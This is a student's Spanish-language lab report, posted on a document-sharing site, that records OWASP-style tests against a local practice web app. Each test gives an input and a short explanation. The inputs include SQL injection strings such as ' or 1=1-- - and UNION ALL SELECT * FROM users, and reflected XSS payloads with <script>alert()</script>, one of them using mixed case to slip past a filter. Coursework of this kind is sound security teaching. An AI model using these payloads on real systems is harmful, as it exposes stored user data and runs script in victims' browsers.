Add to collection(s) Add to saved
  1. No category
Uploaded by hass19hiar

OWASP

advertisement 
UNIVERSIDAD MARIANO GALVEZ DE GUATEMALA
ALUMNO: Hugo Irrael Arévalo Román
CARNÉ: 092-11-4025
Prueba : SQL– Example 1
Datos ingresados:
192.168.0.13/sqli/example1.php?name=root' or 1=1-- - Prueba:
Resultado:
Descripción del resultado de la prueba:
Se agrega 1=1-- - - para mostrar todos los usuarios.
Prueba : SQL injections – Example 4
Datos ingresados:
192.168.0.13/xss/example4.php?name=UMG2021
Prueba:
Resultado:
Descripción del resultado de la prueba:
En la url en el apartado donde dice name=Hacker el nombre Hacker se puede cambiar para
mostrar otro valor en pantalla
Prueba : SQL injections – Example 5
Datos ingresados:
192.168.0.13/sqli/example5.php?id=2 union all select * from users
Prueba:
Resultado:
Descripción del resultado de la prueba:
Lo que hacemos es unir un script para ejecutar y mostrar otros datos
Prueba : XSS – Example 2
Datos ingresados:
192.168.0.13/xss/example2.php? name=hacker<SCript>alert('xss')</SCript>
Prueba:
Resultado:
Descripción del resultado de la prueba:
En este caso se inyecto el payload de alerta veremos que ‘<script>’ y ‘</script>’ son filtrados
Prueba : XSS – Example 1
Datos ingresados:
192.168.0.13/xss/example1.php?name=hacker<script>alert('Hackplayers')</script>
Prueba:
Resultado:
Descripción del resultado de la prueba:
En este caso se hizo una ejecución de java script dentro de la url
Related documents
Manual de uso del Clasificador Analisis tecnico
Manual de uso del Clasificador Analisis tecnico
4PICS
4PICS
AE4-ACTIVITY-No.-1B-1
AE4-ACTIVITY-No.-1B-1
Router 6000 Comisionamiento y Script inicial de Configuraciones
Router 6000 Comisionamiento y Script inicial de Configuraciones
laws of exponents review
laws of exponents review
BASH-Actividades-03.04-Ejemplos-de-shell-Scripts
BASH-Actividades-03.04-Ejemplos-de-shell-Scripts
MANUAL PARA CENTOS 7
MANUAL PARA CENTOS 7
iniciando scripts
iniciando scripts
Download
advertisement